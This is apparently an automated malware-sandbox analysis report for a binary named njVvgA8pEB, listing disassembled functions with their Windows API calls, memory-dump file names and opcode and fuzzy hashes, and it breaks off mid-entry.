                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                          • API String ID: 2574300362-192647395
                                                                          • Opcode ID: 7de4142cd59e0655dbb8e7fdcc9be1f9edd17c68e3ed0e23db53ee60b836dcb8
                                                                          • Instruction ID: cd5ad0f666d219627dea2e2d959476ccf559a474c5c155dbc45464e3bd8ff915
                                                                          • Opcode Fuzzy Hash: 7de4142cd59e0655dbb8e7fdcc9be1f9edd17c68e3ed0e23db53ee60b836dcb8
                                                                          • Instruction Fuzzy Hash: A9D01274A14713CFDB229F31E818B8676E8AF05351F15C83AD4C6D6150D670D8C0C654
                                                                          Function 0038EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0038EE3D
                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0038EE4B
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0038EF0B
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0038EF1A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                          • String ID:
                                                                          • API String ID: 2576544623-0
                                                                          • Opcode ID: 3f0fd58daff596d36c6cbc383f7d173bedc8d4a0e4ec16a9b29c830c48335672
                                                                          • Instruction ID: ed9298dcbd647e0fd65e0f5421e5b94ec16469b0f95f7963f5f3626f3416c089
                                                                          • Opcode Fuzzy Hash: 3f0fd58daff596d36c6cbc383f7d173bedc8d4a0e4ec16a9b29c830c48335672
                                                                          • Instruction Fuzzy Hash: 83518D71504301AFD316EF20DC85EABB7E8EF98710F10482DF595DA2A1EB70A948CB92
                                                                          Function 0036E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0036E628
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen
                                                                          • String ID: ($|
                                                                          • API String ID: 1659193697-1631851259
                                                                          • Opcode ID: b5cd414e70e73f1d766bafdfc2d2fb4843243dc5a10d85c10ab330fee0e3a4fa
                                                                          • Instruction ID: 6193c73f2438108d5c892e3e30b7a6de0599d87b52a5d7870b7c8d2030736381
                                                                          • Opcode Fuzzy Hash: b5cd414e70e73f1d766bafdfc2d2fb4843243dc5a10d85c10ab330fee0e3a4fa
                                                                          • Instruction Fuzzy Hash: B2323679A007059FDB29CF59C48196AB7F0FF48320B16C46EE89ADB7A5E770E941CB40
                                                                          Function 003822EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0038180A,00000000), ref: 003823E1
                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00382418
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                          • String ID:
                                                                          • API String ID: 599397726-0
                                                                          • Opcode ID: 555692d989b9619dbdcfcf69689bc05b9dc3e1eb0a4566d5ef4fad75c8c842fc
                                                                          • Instruction ID: fa50f8c56743642ad17e1f709f22f2b7cdef33afeb99f8b121438435ba3b1f79
                                                                          • Opcode Fuzzy Hash: 555692d989b9619dbdcfcf69689bc05b9dc3e1eb0a4566d5ef4fad75c8c842fc
                                                                          • Instruction Fuzzy Hash: 0041E775A04309BFEB12EE96DC85FBBB7BCEB40314F1040AAFA01A7541DBB59E419760
                                                                          Function 0037B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0037B343
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0037B39D
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0037B3EA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                          • String ID:
                                                                          • API String ID: 1682464887-0
                                                                          • Opcode ID: 55a728c0349b4546e72f06ec0cf54f294a1c06cc6a71eb480590d918c59d57e5
                                                                          • Instruction ID: 2d0dfce6c21cf6f884c7260dd768781504292e9fa60fafa4adc0ddb04e053681
                                                                          • Opcode Fuzzy Hash: 55a728c0349b4546e72f06ec0cf54f294a1c06cc6a71eb480590d918c59d57e5
                                                                          • Instruction Fuzzy Hash: 77216D35A00508EFDB01EFA5D885AEDFBB8FF49310F1480AAE905EB351CB31A955CB51
                                                                          Function 003687E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00330DB6: std::exception::exception.LIBCMT ref: 00330DEC
                                                                            • Part of subcall function 00330DB6: __CxxThrowException@8.LIBCMT ref: 00330E01
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0036882B
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00368858
                                                                          • GetLastError.KERNEL32 ref: 00368865
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 1922334811-0
                                                                          • Opcode ID: 1c1f971c8a754f4f611e5f2373fd8e7884eb6692094183307228954d7d436132
                                                                          • Instruction ID: f51d4daa85fb9d3d6288bae6ff9c10e23687f0aaea52609451dc158da33bf197
                                                                          • Opcode Fuzzy Hash: 1c1f971c8a754f4f611e5f2373fd8e7884eb6692094183307228954d7d436132
                                                                          • Instruction Fuzzy Hash: EC116AB2914205AFE719EFA4DC85D6BB7ECFB48710B20862EE45697241EA71AC408B60
                                                                          Function 0036874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00368774
                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0036878B
                                                                          • FreeSid.ADVAPI32(?), ref: 0036879B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                          • String ID:
                                                                          • API String ID: 3429775523-0
                                                                          • Opcode ID: 239cce3efc1cc4f47db92391c568f4503acfb9145a04785d26b69b7fcced9687
                                                                          • Instruction ID: e574aeef304b17ea9dcf31db43041fe08215b8cb4e238258a0a5aff86510a03f
                                                                          • Opcode Fuzzy Hash: 239cce3efc1cc4f47db92391c568f4503acfb9145a04785d26b69b7fcced9687
                                                                          • Instruction Fuzzy Hash: C0F04975A1130CBFDF00DFF4DC89ABEBBBCEF08301F1045A9A901E2281E6726A048B50
                                                                          Function 00378889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __time64.LIBCMT ref: 0037889B
                                                                            • Part of subcall function 0033520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00378F6E,00000000,?,?,?,?,0037911F,00000000,?), ref: 00335213
                                                                            • Part of subcall function 0033520A: __aulldiv.LIBCMT ref: 00335233
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                                          • String ID: 0e=
                                                                          • API String ID: 2893107130-2613636977
                                                                          • Opcode ID: bc03d3d466a22e13dd10d8b4c7ad81927b86cbfa75c66fc03451b961fcd0eb82
                                                                          • Instruction ID: 2c7fa4c74640b5ae2ec497f033c507a17f286548eb73fc37906b1096d2b9bd91
                                                                          • Opcode Fuzzy Hash: bc03d3d466a22e13dd10d8b4c7ad81927b86cbfa75c66fc03451b961fcd0eb82
                                                                          • Instruction Fuzzy Hash: 6621A2726255108BC72ACF29E841A52B3E5EBA5311F698E6DD0F9CB2C0CA34A945CB54
                                                                          Function 0037C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0037C6FB
                                                                          • FindClose.KERNEL32(00000000), ref: 0037C72B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 116944690522588b32605644259f8b5ff03fa64e39ce8fa0a0bac7f5e3e16cd8
                                                                          • Instruction ID: 5d8ca8d9dac91c533ca797d1849f38147c6ba351802fcaee9138f18cadb8cb9e
                                                                          • Opcode Fuzzy Hash: 116944690522588b32605644259f8b5ff03fa64e39ce8fa0a0bac7f5e3e16cd8
                                                                          • Instruction Fuzzy Hash: EB1182756002009FDB15DF29D855A6AF7E8EF49324F00851EF9A9CB291DB34A801CB81
                                                                          Function 0037A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00389468,?,0039FB84,?), ref: 0037A097
                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00389468,?,0039FB84,?), ref: 0037A0A9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFormatLastMessage
                                                                          • String ID:
                                                                          • API String ID: 3479602957-0
                                                                          • Opcode ID: 1bcc6aa69d9eed047701f42a488d508c1b05b633447bf26dccafdb0a4e2709ce
                                                                          • Instruction ID: cd36d81120a5ae59f94240c27e00fef3b03635a37f8ce73d8130afa87be9fb9c
                                                                          • Opcode Fuzzy Hash: 1bcc6aa69d9eed047701f42a488d508c1b05b633447bf26dccafdb0a4e2709ce
                                                                          • Instruction Fuzzy Hash: F4F0823510522DBBDB229FA4DC88FEE776CBF08361F008566F909D6181DA309944CBA1
                                                                          Function 003681CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00368309), ref: 003681E0
                                                                          • CloseHandle.KERNEL32(?,?,00368309), ref: 003681F2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                          • String ID:
                                                                          • API String ID: 81990902-0
                                                                          • Opcode ID: 55b2eb43dfdb30be734fb185eb7a662d015e44e583e509c4ec961af25c496b96
                                                                          • Instruction ID: e81598b1bb2fd34a406e634a68eb88606191db5bbbfc370e036c0831cf8e1f72
                                                                          • Opcode Fuzzy Hash: 55b2eb43dfdb30be734fb185eb7a662d015e44e583e509c4ec961af25c496b96
                                                                          • Instruction Fuzzy Hash: 04E0BF71010510AEE7272B60EC49D7777ADEF04310B148929B465C4470DB625C91DB10
                                                                          Function 0033A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00338D57,?,?,?,00000001), ref: 0033A15A
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0033A163
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: d5b98fb7f7dc7d9876038460bd6329efae66aa3aa14349cf607a1666366c2f7f
                                                                          • Instruction ID: 210918fed998cbecece1f1817414a1f03a0778455084f5078d9bab0dfdd79496
                                                                          • Opcode Fuzzy Hash: d5b98fb7f7dc7d9876038460bd6329efae66aa3aa14349cf607a1666366c2f7f
                                                                          • Instruction Fuzzy Hash: 06B09235054208EFCB022BA1EC49B883F6CEB44BA2F404022F60DC4060CB6758A08A91
                                                                          Function 0033F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 60f4f83be34cb40353533b09fbd5e05d5e5ce74865c0a1fe5dddbc1f45379020
                                                                          • Instruction ID: 363200af6f6229f1833d7461eff99817f701f0be3aa5a1cf6098edceefacca84
                                                                          • Opcode Fuzzy Hash: 60f4f83be34cb40353533b09fbd5e05d5e5ce74865c0a1fe5dddbc1f45379020
                                                                          • Instruction Fuzzy Hash: BF320062D29F014DD7279634DCB2336A28CAFB73D4F55D737E81AB5AA6EB28C4834100
                                                                          Function 0034242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9995b24822348121e20d945c49b28923eac6436ab4ebdabb0fc7e82cb61a0738
                                                                          • Instruction ID: d52ae57232752714f1935d2a837c88c3e145c7a1ee484f0984b2fc455a485c63
                                                                          • Opcode Fuzzy Hash: 9995b24822348121e20d945c49b28923eac6436ab4ebdabb0fc7e82cb61a0738
                                                                          • Instruction Fuzzy Hash: C6B10321D2AF404DD76396398831336BB9CAFBB2D5F91D71BFC1674D62EB2185838141
                                                                          Function 00374C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00374C4A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: mouse_event
                                                                          • String ID:
                                                                          • API String ID: 2434400541-0
                                                                          • Opcode ID: 1216a78efffc76c0f2fa5d89b0027d3249e9f9f581ab870baf609004b9abe182
                                                                          • Instruction ID: a6886e318863d4762a5b5453b964557c2f6f5056f8ce6af032b85c0e4bbdde68
                                                                          • Opcode Fuzzy Hash: 1216a78efffc76c0f2fa5d89b0027d3249e9f9f581ab870baf609004b9abe182
                                                                          • Instruction Fuzzy Hash: F4D05E9116520B78FD3F0724AE0FF7A050CE304782FD2C149710ACA0C1EF997C409032
                                                                          Function 003687B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00368389), ref: 003687D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: LogonUser
                                                                          • String ID:
                                                                          • API String ID: 1244722697-0
                                                                          • Opcode ID: c5b87c062065af86c3d1eacd7f096545ecea4249db102b7fcd5a169b75bab32e
                                                                          • Instruction ID: 4dbaf01370cfdb4cadfa03385ec6ba3bbc48d138c1a0b7bad9c27e35cce7e509
                                                                          • Opcode Fuzzy Hash: c5b87c062065af86c3d1eacd7f096545ecea4249db102b7fcd5a169b75bab32e
                                                                          • Instruction Fuzzy Hash: 09D05E3226450EAFEF018EA4DC01EBE3B6DEB04B01F408111FE15C51A1C776D835AB60
                                                                          Function 0033A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0033A12A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: a342b1dbba88cdabb59159ff07f56a42278b71ab65c62436c65c385edd7a4b8b
